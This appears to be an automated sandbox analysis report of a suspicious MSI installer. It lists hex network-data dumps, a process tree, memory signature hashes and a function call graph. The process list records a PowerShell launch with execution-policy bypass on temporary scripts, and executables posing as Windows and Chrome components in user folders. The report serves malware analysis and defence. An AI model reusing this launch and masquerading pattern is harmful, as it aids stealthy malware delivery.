                                                                  2024-07-11 01:56:03 UTC1371INData Raw: b1 3f de d9 24 b8 b7 fc f9 91 a9 7d be f2 a9 4d e1 5b 10 f7 59 9e b1 d2 b8 f3 99 ed 2e 00 5c fe 1c d6 e2 13 34 06 36 34 06 ea 04 d0 ff 9f 61 04 fc d0 a8 6c ce 10 aa 52 db ff fb 6f 25 48 10 40 0f bf 42 e2 17 22 6c 69 cd e5 e4 68 9d 5a 9e 54 f8 ed 1a fc 58 2f 6f 35 2e ba ed 08 81 65 73 eb 1c 81 df d7 bc a8 96 f7 fc 59 9e 37 40 22 64 40 aa 1d 11 c6 b4 80 af e2 0e 8e 13 5b b2 17 b8 1b 18 f0 94 bf 62 2e be 03 f5 e0 1c 70 a3 75 00 75 b4 f9 38 ab 34 2e 5e 77 dc 76 7c 5d 03 16 59 c8 91 e8 fc 6a a6 33 76 07 d4 8a 1c 08 a7 b4 17 ee 96 4b 3e a6 a1 0d 9e b8 56 20 d5 b2 2e 84 13 72 a7 b6 2b 68 97 1b ca 64 c1 7b 74 aa d6 84 ea e0 28 2a 59 78 c7 8b 82 f4 c7 cf 75 33 df 79 ac 94 48 9a 0f 74 5e 8d 2b 43 54 a9 5f 46 22 91 a2 94 a9 13 e7 b0 ec 0d 7a fc 6d eb 52 08 cf 3f 71
                                                                  Data Ascii: ?$}M[Y.\464alRo%H@B"lihZTX/o5.esY7@"d@[b.puu84.^wv|]Yj3vK>V .r+hd{t(*Yxu3yHt^+CT_F"zmR?q
                                                                  2024-07-11 01:56:03 UTC1371INData Raw: e7 54 6f 4e 12 13 73 9c 94 4f 08 12 63 27 95 4f 0e 11 73 45 1d c8 78 1a 7a 26 6b 3e f3 5b 1d af 37 d4 cf 62 49 06 ec aa 49 10 a8 16 95 ab 0f d3 e1 84 49 05 29 30 18 c8 73 50 f4 e9 b7 d4 27 2c ac 00 1a fa bb e8 bd 3f 6b 6e 7d 43 10 ec cb 3a 19 68 32 13 0a 9f d4 13 66 f4 1b 50 94 eb e3 73 09 6c 1a 15 bb eb 2d 18 68 dc 01 c0 c5 57 ca ef 0d 21 a2 fa af 45 77 4f e2 dd 8b 7c 78 e7 76 5c 77 cf a1 9f 20 22 11 ff e0 0f 8b 98 c0 71 28 a5 90 44 3b ee 8d 44 2b ad 27 96 ee 3b 2f 3b 9d ae 6b 33 b5 da 62 16 fe a7 76 1d e1 61 2f d7 bc b3 92 45 53 bb 86 cb 6c 49 0c 88 26 d0 5e 2c cb a3 1f 65 ea ea f7 2b d5 2d 87 f7 78 f7 2c 8b 2b 50 2c d3 50 65 aa 97 f7 e8 d9 35 d6 ad 34 9e e7 bc 5f f7 c8 83 f7 a8 e8 2f d4 ed e7 0c 3a 5b 36 2c 3b 2e b0 f7 e8 79 38 f6 e8 fe b5 1c 2c 6d 3d
                                                                  Data Ascii: ToNsOc'OsExz&k>[7bIII)0sP',?kn}C:h2fPsl-hW!EwO|xv\w "q(D;D+';/;k3bva/ESlI&^,e+-x,+P,Pe54_/:[6,;.y8,m=


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:21:55:57
                                                                  Start date:10/07/2024
                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\2024.0198840 298135.msi"
                                                                  Imagebase:0x7ff66d9f0000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:21:55:57
                                                                  Start date:10/07/2024
                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                  Imagebase:0x7ff66d9f0000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:2
                                                                  Start time:21:55:58
                                                                  Start date:10/07/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 42DBD1ADE5F4EAE9CD74EFE76BAFFA98
                                                                  Imagebase:0x1e0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:21:56:00
                                                                  Start date:10/07/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                  Imagebase:0x1000000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:21:56:00
                                                                  Start date:10/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:21:56:17
                                                                  Start date:10/07/2024
                                                                  Path:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe"
                                                                  Imagebase:0x7ff60bd70000
                                                                  File size:55'808 bytes
                                                                  MD5 hash:53AB9B8198E8AD8D3A043F40E72B1AB1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  • Detection: 0%, Virustotal, Browse
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:21:56:21
                                                                  Start date:10/07/2024
                                                                  Path:C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe
                                                                  Imagebase:0x7ff74cc30000
                                                                  File size:2'795'808 bytes
                                                                  MD5 hash:D09B0BCEAACCB0B4C2FC6B95B9A5241A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  • Detection: 0%, Virustotal, Browse
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:21:56:21
                                                                  Start date:10/07/2024
                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7480 -s 576
                                                                  Imagebase:0x7ff6755c0000
                                                                  File size:570'736 bytes
                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1843549048.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7930000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                    • API String ID: 0-2392861976
                                                                    • Opcode ID: eeebd2ca0686ba77a9b176456f7838259f51f6ffe7760f795f714f1c8503cd3f
                                                                    • Instruction ID: 70aecd944dbe60fa3f89b890ce2892de517ae78c236da3c67784b48ccbf3acf0
                                                                    • Opcode Fuzzy Hash: eeebd2ca0686ba77a9b176456f7838259f51f6ffe7760f795f714f1c8503cd3f
                                                                    • Instruction Fuzzy Hash: 547104B079024D9FCB249E68D841BBA7BF6AF85354F20842AE505CF2A1DF75C984C7A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1843549048.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7930000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                    • API String ID: 0-2125118731
                                                                    • Opcode ID: f4642164d151778847735dd955150e35dc58c7f6f484bb8d7bd767eac58e14d1
                                                                    • Instruction ID: 817281f6f33b8304766178cf070b358e1bc700200bc6a8cb4df1eb079073e954
                                                                    • Opcode Fuzzy Hash: f4642164d151778847735dd955150e35dc58c7f6f484bb8d7bd767eac58e14d1
                                                                    • Instruction Fuzzy Hash: 3541F2B065464DDFDB24CF64C941BFA7BF9AB02358F148066E4148F2A2DB79C984CBA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (Xcq$LR^q
                                                                    • API String ID: 0-2856513941
                                                                    • Opcode ID: ef4391109d00b0d0d7b713da9d02176603ac0d41d86ef24922849fcc7277cf60
                                                                    • Instruction ID: 11b4b31227380b5c0aa49009a00e13d3aaf8b4568ec26d3bacaf2cf161ad8883
                                                                    • Opcode Fuzzy Hash: ef4391109d00b0d0d7b713da9d02176603ac0d41d86ef24922849fcc7277cf60
                                                                    • Instruction Fuzzy Hash: FF524C34B00218CFDB24EB68C855B6DB7B2FF85304F118099E9499B395DB35AD85CF52
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (Xcq$LR^q
                                                                    • API String ID: 0-2856513941
                                                                    • Opcode ID: 01f2f4b961af72f5a80e6e173a7ab2d4e90fb0fbcb04535c657dceb2f2fec773
                                                                    • Instruction ID: 41d9eebe8ae1dbea524f63d88b43cedeb4251705ffc0a35e425b9476be77b621
                                                                    • Opcode Fuzzy Hash: 01f2f4b961af72f5a80e6e173a7ab2d4e90fb0fbcb04535c657dceb2f2fec773
                                                                    • Instruction Fuzzy Hash: 00514B30B002188FDB24DF68C854BAEBBB2FF88704F1141AEE545AB391DB75AD41CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4c78e92276a46eb3aef22241bd93cda6531369f35c5b40c45c62e5ab01a7fc6
                                                                    • Instruction ID: 414858d7a4ec6d7a586c8757b61e395809000cc118339242c8f2c5b578201f5f
                                                                    • Opcode Fuzzy Hash: c4c78e92276a46eb3aef22241bd93cda6531369f35c5b40c45c62e5ab01a7fc6
                                                                    • Instruction Fuzzy Hash: 96A19034A01254DFCB15DFA8D8849AEBBF2FF89310B1584AAE445EB362D739EC45CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40ddaac0f322e134bf23660300b00f49a03c8da0a7dff286992b84e9be2d24fd
                                                                    • Instruction ID: 2b26214449bba6a26cb9aa59d48f15e3162e60e49dbbd482aeaa486b267ece4c
                                                                    • Opcode Fuzzy Hash: 40ddaac0f322e134bf23660300b00f49a03c8da0a7dff286992b84e9be2d24fd
                                                                    • Instruction Fuzzy Hash: 1FA16D35E002089FDB14FFA5C944AADBBB2FF88340F55851DE406AB365DB38AD49CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 587a7cfaa11bb4bce8623fd2853e7c2bb36337d6ff72d0a18784303b1cc7c4cf
                                                                    • Instruction ID: 647d711e705ffd0b783871a0867352ab930af6b79581acfa608239a8f30e3621
                                                                    • Opcode Fuzzy Hash: 587a7cfaa11bb4bce8623fd2853e7c2bb36337d6ff72d0a18784303b1cc7c4cf
                                                                    • Instruction Fuzzy Hash: 4E71BE70A006458FCB14EF68C884A9EFBF6EF89304F14856EE419DB655DB35AC46CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e0af6d76784f938d2a33a64eb4e52f8c5a2b1128c105aefaf6133c8a832b71c
                                                                    • Instruction ID: 495fa24460036e5ca95656b388d0b8ec4e2f55b73bb76bd2997be8a5e1446325
                                                                    • Opcode Fuzzy Hash: 3e0af6d76784f938d2a33a64eb4e52f8c5a2b1128c105aefaf6133c8a832b71c
                                                                    • Instruction Fuzzy Hash: 66714D70E002089FDB18EFA5D594AADBBF6FF88304F54842DE416AB254DF38AD46CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff0ccc6c7f64874551e66aac455b05a0b35a54e201c28b160bb3960d17878ca0
                                                                    • Instruction ID: c08bb9a20f5f395f9ce9799302f6e9ed90cf21d90aa4e16aaa25fd48e28d6b38
                                                                    • Opcode Fuzzy Hash: ff0ccc6c7f64874551e66aac455b05a0b35a54e201c28b160bb3960d17878ca0
                                                                    • Instruction Fuzzy Hash: 7E415E756402009FDB18EB64C959AADBBB6EFCD750F44406DE406EB3A5DF38AC41CB60
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 38ee9d6c20af40ddc4d98182848de78a710940b2a30c20da6e768731e3f71b77
                                                                    • Instruction ID: 3fb3303f21ad0727ba5427c2c10e9ed9d328f0e5ee8301fc3aeb48baf2e38353
                                                                    • Opcode Fuzzy Hash: 38ee9d6c20af40ddc4d98182848de78a710940b2a30c20da6e768731e3f71b77
                                                                    • Instruction Fuzzy Hash: E6418270A00648DFDB18EF65C8846ADBBB2FF89304F14852DD406AB395DF78AC45CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1835016708.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_fed000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c14967c11d5705711c18d6aee4a72ad18cf567d7b73a372cef691f2017aa348b
                                                                    • Instruction ID: 615e707ff55218380671452f39ccb5f055a3997e58f79d6f86e3d9a5ac61e1c2
                                                                    • Opcode Fuzzy Hash: c14967c11d5705711c18d6aee4a72ad18cf567d7b73a372cef691f2017aa348b
                                                                    • Instruction Fuzzy Hash: E8012B314093809AE7104A27CD84767FF98DF41334F1CC429EE080B54AC279D841E6B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1835016708.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_fed000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec2df5048dee837c47deafbbdafe32f55e2b0e5b561e500b9c47a26b8d6441d8
                                                                    • Instruction ID: f078aa58051fe4c1121f3fa19590d88c506265b3540b0ea1bbedbb350f961b58
                                                                    • Opcode Fuzzy Hash: ec2df5048dee837c47deafbbdafe32f55e2b0e5b561e500b9c47a26b8d6441d8
                                                                    • Instruction Fuzzy Hash: A0014C6140E3C09ED7128B258C94B52BFB4EF53224F1DC5DBD9888F1A7C2699849D772
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 539f43d789dd6f3f499cbb6cb8bc75d0ec8302b7fec7bcd43854f37b2beb7f09
                                                                    • Instruction ID: 8965b6e35733dc26b96e4a6760f414d0ef4f1193974307c6f8ac09edf7ffa418
                                                                    • Opcode Fuzzy Hash: 539f43d789dd6f3f499cbb6cb8bc75d0ec8302b7fec7bcd43854f37b2beb7f09
                                                                    • Instruction Fuzzy Hash: 34F0D435A001099FCB15CF9CD990AEEF7B1FF88324F248199E915A72A1C736AC52CB60
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b33190d099fd61b6b223ead3de70283047cb3e82e24494ec07fd91867514c376
                                                                    • Instruction ID: 6275f9f2345e93a2b12f3a9685e62b9b675714e845a5f1c901b72e6a5506e917
                                                                    • Opcode Fuzzy Hash: b33190d099fd61b6b223ead3de70283047cb3e82e24494ec07fd91867514c376
                                                                    • Instruction Fuzzy Hash: 15F0A0B4D0834A9FCB54DFB894014AFBFF4AB45210F0085AEE865EB342EA356102CFA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 99b76b0208b45a79f72674f5783b00b59e6822548a2229fa1823e716e17af7fe
                                                                    • Instruction ID: f6b7abe5e5a21a97bfb1774537d46eafa475c85b0d82ed9413a92a7d3957de5c
                                                                    • Opcode Fuzzy Hash: 99b76b0208b45a79f72674f5783b00b59e6822548a2229fa1823e716e17af7fe
                                                                    • Instruction Fuzzy Hash: 11F01274B403099FDB04EBA4C565B6E77B2EF45384F104518D101DF365DB7C9D488B80
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e41869311e08c157ea6662392988568ae95acbc3601d3a493bc0ebcb7b47f753
                                                                    • Instruction ID: b719d9d4576d1991023c6b64abb308604060f86b857dc60577c01f1124bf13dd
                                                                    • Opcode Fuzzy Hash: e41869311e08c157ea6662392988568ae95acbc3601d3a493bc0ebcb7b47f753
                                                                    • Instruction Fuzzy Hash: F8E026B4E0420E9F8F48EFB995421BEFBF5EB48200F10856E9819E3350E63456519FA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1836094841.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cc8b181af38f8d4337278937bd8bbd1b2dab4930f46586682e9d4d4dc5e55a9
                                                                    • Instruction ID: 68119bb431095aaf90f49a8ed09e22e4d72133fcba3a8b60def43e786c30bf34
                                                                    • Opcode Fuzzy Hash: 8cc8b181af38f8d4337278937bd8bbd1b2dab4930f46586682e9d4d4dc5e55a9
                                                                    • Instruction Fuzzy Hash: D0D05E7004D7D46EC3A32B64A40D6AD3FB89B07610B5840CEF1C98D0A3E5577460C373
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1843549048.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7930000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                    • API String ID: 0-3732357466
                                                                    • Opcode ID: e64a761b602fed8f7d47e300a8f58fa165acce152c537fcd755d873503388435
                                                                    • Instruction ID: dd6e7558b1441c90c7de8079fe2471279774b2bf546f03881b1f7e20dd0fc96c
                                                                    • Opcode Fuzzy Hash: e64a761b602fed8f7d47e300a8f58fa165acce152c537fcd755d873503388435
                                                                    • Instruction Fuzzy Hash: 74512775B0430ACFDB258A6DA80466BBBFBEFC1224F24847BD455CB241DA32C845C7A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1843549048.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7930000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'^q$4'^q$4'^q$$^q$$^q
                                                                    • API String ID: 0-2831958266
                                                                    • Opcode ID: 9b1cd2b44b3e8abf57c9cef6c5c1ba8cf2c827a58ae0a05e79cbcb2528a49007
                                                                    • Instruction ID: 93064a68d430186bf60bc1285e1774ccd2a22e3edc775f48f390e2d4dbec1f9a
                                                                    • Opcode Fuzzy Hash: 9b1cd2b44b3e8abf57c9cef6c5c1ba8cf2c827a58ae0a05e79cbcb2528a49007
                                                                    • Instruction Fuzzy Hash: 06012B61B483464FC72A163D38286A56FF79BC3964B2904BBD041CF357CE698D4B83A3

                                                                    Execution Graph

                                                                    Execution Coverage:1.3%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:4.7%
                                                                    Total number of Nodes:344
                                                                    Total number of Limit Nodes:8
                                                                    execution_graph 30212 7ff60bd7158c 30216 7ff60bd715a0 __scrt_initialize_crt __scrt_acquire_startup_lock __scrt_release_startup_lock 30212->30216 30213 7ff60bd716d8 30215 7ff60bd716f5 _exit 30213->30215 30214 7ff60bd715eb 30216->30213 30216->30214 30217 7ff60bd71671 30216->30217 30219 7ff60bd71669 _register_thread_local_exe_atexit_callback 30216->30219 30218 7ff60bd71676 _get_wide_winmain_command_line 30217->30218 30224 7ff60bd75d10 30218->30224 30219->30217 30221 7ff60bd71692 30221->30213 30222 7ff60bd7169d 30221->30222 30222->30214 30223 7ff60bd716a2 _cexit 30222->30223 30223->30214 30308 7ff60bd73278 30224->30308 30227 7ff60bd73278 10 API calls 30228 7ff60bd75d54 30227->30228 30312 7ff60bd74ea0 30228->30312 30235 7ff60bd760f6 30237 7ff60bd754f4 34 API calls 30235->30237 30254 7ff60bd76121 30235->30254 30236 7ff60bd760a7 30400 7ff60bd72900 60 API calls 30236->30400 30237->30254 30238 7ff60bd76145 LoadLibraryExW 30243 7ff60bd7615c GetProcAddress 30238->30243 30244 7ff60bd7618f 30238->30244 30239 7ff60bd75dca 30241 7ff60bd75ee6 30239->30241 30242 7ff60bd75dd6 30239->30242 30379 7ff60bd724a4 34 API calls 30241->30379 30246 7ff60bd75de3 30242->30246 30249 7ff60bd75e41 30242->30249 30243->30244 30247 7ff60bd76174 RoInitialize 30243->30247 30401 7ff60bd74ff8 abort GetProcessHeap HeapFree 30244->30401 30295 7ff60bd75e0b 30246->30295 30372 7ff60bd7242c 34 API calls 30246->30372 30251 7ff60bd761d4 30247->30251 30252 7ff60bd76185 30247->30252 30374 7ff60bd724a4 34 API calls 30249->30374 30403 7ff60bd74ff8 abort GetProcessHeap HeapFree 30251->30403 30252->30244 30253 7ff60bd75ef5 30380 7ff60bd7373c 34 API calls 30253->30380 30254->30238 30254->30244 30259 7ff60bd754f4 34 API calls 30254->30259 30256 7ff60bd75dfb 30373 7ff60bd7373c 34 API calls 30256->30373 30260 7ff60bd76144 30259->30260 30260->30238 30261 7ff60bd75e50 30375 7ff60bd7373c 34 API calls 30261->30375 30263 7ff60bd761a4 30402 7ff60bd74ff8 abort GetProcessHeap HeapFree 30263->30402 30267 7ff60bd75f29 30383 7ff60bd74ff8 abort GetProcessHeap HeapFree 30267->30383 30268 7ff60bd75f05 30268->30267 30381 7ff60bd74ff8 abort GetProcessHeap HeapFree 30268->30381 30271 7ff60bd75e60 30275 7ff60bd75e84 30271->30275 30376 7ff60bd74ff8 abort GetProcessHeap HeapFree 30271->30376 30272 7ff60bd761e9 30404 7ff60bd74ff8 abort GetProcessHeap HeapFree 30272->30404 30274 7ff60bd75f38 30287 7ff60bd72dac 61 API calls 30274->30287 30274->30295 30378 7ff60bd74ff8 abort GetProcessHeap HeapFree 30275->30378 30277 7ff60bd75f1f 30382 7ff60bd74ff8 abort GetProcessHeap HeapFree 30277->30382 30278 7ff60bd75f92 30278->30278 30385 7ff60bd74f40 10 API calls 30278->30385 30280 7ff60bd761f4 30283 7ff60bd761af 30280->30283 30283->30221 30284 7ff60bd75e7a 30377 7ff60bd74ff8 abort GetProcessHeap HeapFree 30284->30377 30285 7ff60bd75e93 30290 7ff60bd72dac 61 API calls 30285->30290 30285->30295 30287->30295 30289 7ff60bd75feb 30386 7ff60bd74ff8 abort GetProcessHeap HeapFree 30289->30386 30290->30295 30292 7ff60bd75ff6 _wcslwr_s 30293 7ff60bd7603d 30292->30293 30294 7ff60bd76032 30292->30294 30388 7ff60bd7503c 30293->30388 30387 7ff60bd74e38 7 API calls 30294->30387 30384 7ff60bd73db8 34 API calls 30295->30384 30300 7ff60bd76075 30396 7ff60bd74ff8 abort GetProcessHeap HeapFree 30300->30396 30302 7ff60bd7607f 30397 7ff60bd74ff8 abort GetProcessHeap HeapFree 30302->30397 30304 7ff60bd7608e 30398 7ff60bd73310 free _invalid_parameter_noinfo_noreturn 30304->30398 30306 7ff60bd7609c 30399 7ff60bd74ff8 abort GetProcessHeap HeapFree 30306->30399 30309 7ff60bd73285 30308->30309 30309->30309 30405 7ff60bd732a0 30309->30405 30408 7ff60bd738c4 30312->30408 30314 7ff60bd74eb7 30414 7ff60bd749ac 30314->30414 30316 7ff60bd74ecb 30316->30236 30317 7ff60bd72dac 30316->30317 30318 7ff60bd72dc3 30317->30318 30436 7ff60bd72964 30318->30436 30321 7ff60bd729c8 30322 7ff60bd72a0d 30321->30322 30323 7ff60bd729f3 30321->30323 30493 7ff60bd727bc 30322->30493 